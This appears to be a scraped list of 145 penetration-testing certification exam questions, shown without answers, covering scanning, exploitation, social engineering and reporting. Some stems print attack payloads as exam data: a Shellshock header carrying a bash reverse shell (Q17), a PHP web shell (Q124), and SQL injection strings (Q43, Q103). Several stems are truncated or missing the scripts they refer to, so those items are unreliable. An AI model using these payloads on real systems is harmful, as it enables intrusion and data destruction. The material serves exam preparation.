MoreExam
1. Question Content...
EXPLANATION
Answer: X - EXPLANATION Content.
Question1: A penetration tester is able to use a command injection vulnerability in a web application to get a reverse shell on a system After running a few commands, the tester runs the following:python -c 'import pty; pty.spawn("/bin/bash")'Which of the following actions Is the penetration tester performing?
Question2: Which of the following tools would be best to use to conceal data in various kinds of image files?
Question3: Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
Question4: During a vulnerability scanning phase, a penetration tester wants to execute an Nmap scan using custom NSE scripts stored in the following folder:/home/user/scriptsWhich of the following commands should the penetration tester use to perform this scan?
Question5: A Chief Information Security Officer wants to evaluate the security of the company's e-commerce application.Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms?
Question6: A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing?
Question7: Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?
Question8: A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from the target machine. Which of the following MOST likely caused the attack to fail?
Question9: During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred?
Question10: During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames.Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?
Question11: Apenetration tester found the following valid URL while doing a manual assessment of a web application:http://www.example.com/product.php?id=123987.Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?
Question12: A penetration tester is testing a new API for the company's existing services and is preparing the following script:Which of the following would the test discover?
Question13: A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?
Question14: A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.Which of the following Nmap scan syntaxes would BEST accomplish this objective?
Question15: A penetration tester is attempting to discover live hosts on a subnet quickly.Which of the following commands will perform a ping scan?
Question16: A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider's metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?
Question17: A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept":"text/html,application/xhtml+xml,application/xml"}Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
Question18: Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?
Question19: During a code review assessment, a penetration tester finds the following vulnerable code inside one of the web application files:<% String id = request.getParameter("id"); %>Employee ID: <%= id %>Which of the following is the best remediation to prevent a vulnerability from being exploited, based on this code?
Question20: An assessor wants to use Nmap to help map out a stateful firewall rule set. Which of the following scans will the assessor MOST likely run?
Question21: A client asks a penetration tester to retest its network a week after the scheduled maintenance window. Which of the following is the client attempting to do?
Question22: Which of the following factors would a penetration tester most likely consider when testing at a location?
Question23: A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?
Question24: A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:Which of the following combinations of tools would the penetration tester use to exploit this script?
Question25: A penetration tester fuzzes an internal server looking for hidden services and applications and obtains the following output:Which of the following is the most likely explanation for the output?
Question26: During a penetration tester found a web component with no authentication requirements. The web component also allows file uploads and is hosted on one of the target public web the following actions should the penetration tester perform next?
Question27: A penetration tester learned that when users request password resets, help desk analysts change users' passwords to 123change. The penetration tester decides to brute force an internet-facing webmail to check which users are still using the temporary password. The tester configures the brute-force tool to test usernames found on a text file and the... Which of the following techniques is the penetration tester using?
Question28: A penetration tester is conducting an assessment for an e-commerce company and successfully copies the user database to the local machine. After a closer review, the penetration tester identifies several high-profile celebrities who have active user accounts with the online service. Which of the following is the most appropriate next step?
Question29: A penetration tester wrote the following script on a compromised system:#!/bin/bashnetwork='10.100.100'ports='22 23 80 443'for x in {1 .. 254};do (nc -zv $network.$x $ports );doneWhich of the following would explain using this script instead of another tool?
Question30: Which of the following assessment methods is MOST likely to cause harm to an ICS environment?
Question31: A penetration tester wants to find the password for any account in the domain without locking any of the accounts. Which of the following commands should the tester use?
Question32: A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?
Question33: A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?
Question34: A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables.Which of the following should be included as a recommendation in the remediation report?
Question35: A penetration tester wrote the following script to be used in one engagement:Which of the following actions will this script perform?
Question36: A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.Which of the following describes the scope of the assessment?
Question37: Which of the following members of a client organization are most likely authorized to provide a signed authorization letter prior to the start date of a penetration test?
Question38: Given the following script:Which of the following BEST characterizes the function performed by lines 5 and 6?
Question39: Which of the following tools would be the best to use to intercept an HTTP response of an API, change its content, and forward it back to the origin mobile device?
Question40: A company has recruited a penetration tester to conduct a vulnerability scan over the network. The test is confirmed to be on a known environment. Which of the following would be the BEST option to identify a system properly prior to performing the assessment?
Question41: Penetration tester who was exclusively authorized to conduct a physical assessment noticed there were no cameras pointed at the dumpster for company. The penetration tester returned at night and collected garbage that contained receipts for recently purchased networking :. The models of equipment purchased are vulnerable to attack. Which of the following is the most likely next step for the penetration?
Question42: Which of the following documents is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables?
Question43: A penetration tester conducted an assessment on a web server. The logs from this session show the following:http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ' ; DROP TABLE SERVICES; -- Which of the following attacks is being attempted?
Question44: A penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While conducting the assessment, the support organization of the rig reported issues connecting to corporate applications and upstream services for data acquisitions. Which of the following is the MOST likely culprit?
Question45: A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the connection. Which of the following payloads are MOST likely to establish a shell successfully?
Question46: After running the enum4linux.pl command, a penetration tester received the following output:Which of the following commands should the penetration tester run NEXT?
Question47: The provision that defines the level of responsibility between the penetration tester and the client for preventing unauthorized disclosure is found in the:
Question48: A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
Question49: Which of the following documents must be signed between the penetration tester and the client to govern how any provided information is managed before, during, and after the engagement?
Question50: A penetration tester is required to perform a vulnerability scan that reduces the likelihood of false positives and increases the true positives of the results. Which of the following would MOST likely accomplish this goal?
Question51: Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools?
Question52: A penetration tester created the following script to use in an engagement:However, the tester is receiving the following error when trying to run the script:Which of the following is the reason for the error?
Question53: A penetration tester is trying to bypass an active response tool that blocks IP addresses that have more than100 connections per minute. Which of the following commands would allow the tester to finish the test without being blocked?
Question54: Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up a fake log-in page and harvest credentials when target employees click on links in a phishing email. Which of the following commands would best help the tester determine which cloud email provider the log-in page needs to mimic?
Question55: A company provided the following network scope for a penetration test:169.137.1.0/24221.10.1.0/24149.14.1.0/24A penetration tester discovered a remote command injection on IP address 149.14.1.24 and exploited the system. Later, the tester learned that this particular IP address belongs to a third party. Which of the following stakeholders is responsible for this mistake?
Question56: A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts?
Question57: Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?
Question58: A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?
Question59: A penetration tester wrote the following Bash script to brute force a local service password:..ting as expected. Which of the following changes should the penetration tester make to get the script to work?
Question60: A penetration tester was hired to test Wi-Fi equipment. Which of the following tools should be used to gather information about the wireless network?
Question61: A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?
Question62: A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?
Question63: A penetration tester opened a reverse shell on a Linux web server and successfully escalated privileges to root.During the engagement, the tester noticed that another user logged in frequently as root to perform work tasks.To avoid disrupting this user's work, which of the following is the BEST option for the penetration tester to maintain root-level persistence on this server during the test?
Question64: A penetration tester ran a simple Python-based scanner. The following is a snippet of the code:Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS?
Question65: A security engineer is trying to bypass a network IPS that isolates the source when the scan exceeds 100 packets per minute. The scope of the scan is to identify web servers in the 10.0.0.0/16 subnet.Which of the following commands should the engineer use to achieve the objective in the least amount of time?
Question66: A penetration tester requested, without express authorization, that a CVE number be assigned for a new vulnerability found on an internal client application. Which of the following did the penetration tester most likely breach?
Question67: Given the following user-supplied data:www.comptia.com/info.php?id=1 AND 1=1Which of the following attack techniques is the penetration tester likely implementing?
Question68: During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?
Question69: An assessor wants to run an Nmap scan as quietly as possible. Which of the following commands will give the LEAST chance of detection?
Question70: A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?
Question71: A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the following would have MOST effectively prevented this misunderstanding?
Question72: A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?
Question73: In Java and C/C++, variable initialization is critical because:
Question74: During a client engagement, a penetration tester runs the following Nmap command and obtains the following output:nmap -sV -- script ssl-enum-ciphers -p 443 remotehost| TLS_ECDHE_ECDSA_WITH_RC4_128_SHA| TLS_ECDHE_RSA_WITH_RC4_128_SHATLS_RSA_WITH_RC4_128_SHA (rsa 2048)TLS_RSA_WITH_RC4_128_MD5 (rsa 2048)Which of the following should the penetration tester include in the report?
Question75: A penetration tester is examining a Class C network to identify active systems quickly. Which of the following commands should the penetration tester use?
Question76: A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity?
Question77: A penetration tester is conducting an assessment of an organization that has both a web and mobile application. While testing the user profile page, the penetration tester notices that additional data is returned in the API response, which is not displayed in the web user interface. Which of the following is the most effective technique to extract sensitive user data?
Question78: A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.Which of the following is the BEST way to ensure this is a true positive?
Question79: A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings?
Question80: An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?
Question81: Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?
Question82: A penetration tester is reviewing the logs of a proxy server and discovers the following URLs:https://test.comptia.com/profile.php?userid=1546https://test.cpmptia.com/profile.php?userid=5482https://test.comptia.com/profile.php?userid=3618Which of the following types of vulnerabilities should be remediated?
Question83: A penetration tester writes the following script:Which of the following objectives is the tester attempting to achieve?
Question84: A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection?
Question85: A penetration tester gives the following command to a systems administrator to execute on one of the target servers:rm -f /var/www/html/G679h32gYu.phpWhich of the following BEST explains why the penetration tester wants this command executed?
Question86: Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:
Question87: A penetration tester was brute forcing an internal web server and ran a command that produced the following output:However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.Which of the following is the MOST likely reason for the lack of output?
Question88: A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?
Question89: After gaining access to a Linux system with a non-privileged account, a penetration tester identifies the following file:Which of the following actions should the tester perform FIRST?
Question90: During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout?
Question91: A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client's requirements?
Question92: ion tester is attempting to get more people from a target company to download and run an executable. Which of the following would be the.. :tive way for the tester to achieve this objective?
Question93: A penetration tester received a .pcap file to look for credentials to use in an engagement.Which of the following tools should the tester utilize to open and read the .pcap file?
Question94: During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited?
Question95: A penetration tester who is working remotely is conducting a penetration test using a wireless connection.Which of the following is the BEST way to provide confidentiality for the client while using this connection?
Question96: A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router.Which of the following is MOST vulnerable to a brute-force attack?
Question97: A penetration tester obtained the following results after scanning a web server using the dirb utility:...GENERATED WORDS: 4612----Scanning URL: http://10.2.10.13/ ----+http://10.2.10.13/about (CODE:200|SIZE:1520)+http://10.2.10.13/home.html (CODE:200|SIZE:214)+http://10.2.10.13/index.html (CODE:200|SIZE:214)+http://10.2.10.13/info (CODE:200|SIZE:214)...DOWNLOADED: 4612 - FOUND: 4Which of the following elements is MOST likely to contain useful information for the penetration tester?
Question98: A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?
Question99: A penetration tester ran the following command on a staging server:python -m SimpleHTTPServer 9891Which of the following commands could be used to download a file named exploit to a target machine for execution?
Question100: A penetration tester issues the following command after obtaining a low-privilege reverse shell: wmic service get name,pathname,startmode Which of the following is the most likely reason the penetration tester ran this command?
Question101: In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company's servers. Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?
Question102: A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel.Which of the following would the tester MOST likely describe as a benefit of the framework?
Question103: A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:http://company.com/catalog.asp?productid=22The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:http://company.com/catalog.asp?productid=22;WAITFORDELAY'00:00:05'Which of the following should the penetration tester attempt NEXT?
Question104: While performing the scanning phase of a penetration test, the penetration tester runs the following command:........v -sV -p- 10.10.10.23-28....ip scan is finished, the penetration tester notices all hosts seem to be down. Which of the following options should the penetration tester try next?
Question105: Which of the following situations would MOST likely warrant revalidation of a previous security assessment?
Question106: An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next. Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible?
Question107: A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials?
Question108: A consultant is reviewing the following output after reports of intermittent connectivity issues:? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet]? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet]? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet]? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet]? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet] Which of the following is MOST likely to be reported by the consultant?
Question109: A penetration tester is looking for a particular type of service and obtains the output below:I Target is synchronized with 127.127.38.0 (reference clock)I Alternative Target Interfaces:I 10.17.4.20I Private Servers (0)I Public Servers (0)I Private Peers (0)I Public Peers (0)I Private Clients (2)I 10.20.8.69 169.254.138.63I Public Clients (597)I 4.79.17.248 68.70.72.194 74.247.37.194 99.190.119.152I 12.10.160.20 68.80.36.133 75.1.39.42 108.7.58.118I 68.56.205.98I 2001:1400:0:0:0:0:0:1 2001:16d8:ddOO:38:0:0:0:2I 2002:db5a:bccd:l:21d:e0ff:feb7:b96f 2002:b6ef:81c4:0:0:1145:59c5:3682 I Other Associations (1)|_ 127.0.0.1 seen 1949869 times, last tx was unicast v2 mode 7Which of the following commands was executed by the tester?
Question110: A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team?
Question111: A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the highest likelihood of success?
Question112: A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?
Question113: A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?
Question114: In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name- serial_number>. Which of the following would be the best action for the tester to take NEXT with this information?
Question115: A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
Question116: A penetration tester conducted a discovery scan that generated the following:Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?
Question117: A penetration tester has prepared the following phishing email for an upcoming penetration test:Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?
Question118: A penetration tester gains access to a web server and notices a large number of devices in the system ARP table. Upon scanning the web server, the tester determines that many of the devices are user ...ch of the following should be included in the recommendations for remediation?
Question119: When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?
Question120: During the scoping phase of an assessment, a client requested that any remote code exploits discovered during testing would be reported immediately so the vulnerability could be fixed as soon as possible. The penetration tester did not agree with this request, and after testing began, the tester discovered a vulnerability and gained internal access to the system. Additionally, this scenario led to a loss of confidential credit card data and a hole in the system. At the end of the test, the penetration tester willfully failed to report this information and left the vulnerability in place. A few months later, the client was breached and credit card data was stolen. After being notified about the breach, which of the following steps should the company take NEXT?
Question121: During an assessment, a penetration tester discovers the following code sample in a web application:"(&(userid=*)(userid=*))(I(userid=*)(userPwd=(SHAl}a9993e364706816aba3e25717850c26c9cd0d89d==)) Which of the following injections is being performed?
Question122: A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:Which of the following tools will help the tester prepare an attack for this scenario?
Question123: A penetration tester is enumerating shares and receives the following output:Which of the following should the penetration tester enumerate next?
Question124: During an engagement, a penetration tester was able to upload to a server a PHP file with the following content:<? php system ($_POST['cmd']) ?>Which of the following commands should the penetration tester run to successfully achieve RCE?
Question125: A penetration tester runs the following command:nmap -p- -A 10.0.1.10Given the execution of this command, which of the following quantities of ports will Nmap scan?
Question126: Given the following script:while True:print ("Hello World")Which of the following describes True?
Question127: An organization wants to identify whether a less secure protocol is being utilized on a wireless network.Which of the following types of attacks will achieve this goal?
Question128: Whenaccessing the URL http://192.168.0-1/validate/user.php, a penetration tester obtained the following output:..d index: eid in /apache/www/validate/user.php line 12..d index: uid in /apache/www/validate/user.php line 13..d index: pw in /apache/www/validate/user.php line 14..d index: acl in /apache/www/validate/user.php line 15
Question129: A company requires that all hypervisors have the latest available patches installed. Which of the following would BEST explain the reason why this policy is in place?
Question130: A security analyst needs to perform a scan for SMB port 445 over a/16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive?
Question131: A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?
Question132: A penetration tester discovered a code repository and noticed passwords were hashed before they were stored in the database with the following code? salt = '123' hash = hashlib.pbkdf2_hmac('sha256', plaintext, salt,10000) The tester recommended the code be updated to the following salt = os.urandom(32) hash = hashlib.pbkdf2_hmac('sha256', plaintext, salt, 10000) Which of the following steps should the penetration tester recommend?
Question133: A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement. Which of the following is the BEST option for the tester to take?
Question134: A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine:Which of the following would be the BEST command to use for further progress into the targeted network?
Question135: A security analyst is conducting an unknown environment test from 192.168.3.3. The analyst wants to limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems. Which of the following Nmap commands should the analyst use to achieve this objective?
Question136: A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:Which of the following is the penetration tester conducting?
Question137: A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.Which of the following should the tester verify FIRST to assess this risk?
Question138: A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit?
Question139: A customer adds a requirement to the scope of a penetration test that states activities can only occur during normal business hours. Which of the following BEST describes why this would be necessary?
Question140: A penetration tester is conducting an unknown environment test and gathering additional information that can be used for later stages of an assessment. Which of the following would most likely produce useful information for additional testing?
Question141: A penetration tester wants to test a list of common passwords against the SSH daemon on a network device.Which of the following tools would be BEST to use for this purpose?
Question142: A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log:Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?
Question143: A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?
Question144: A penetration tester discovered that a client uses cloud mail as the company's email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page to remedy the issue. Which of the following BEST describes this attack?
Question145: When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?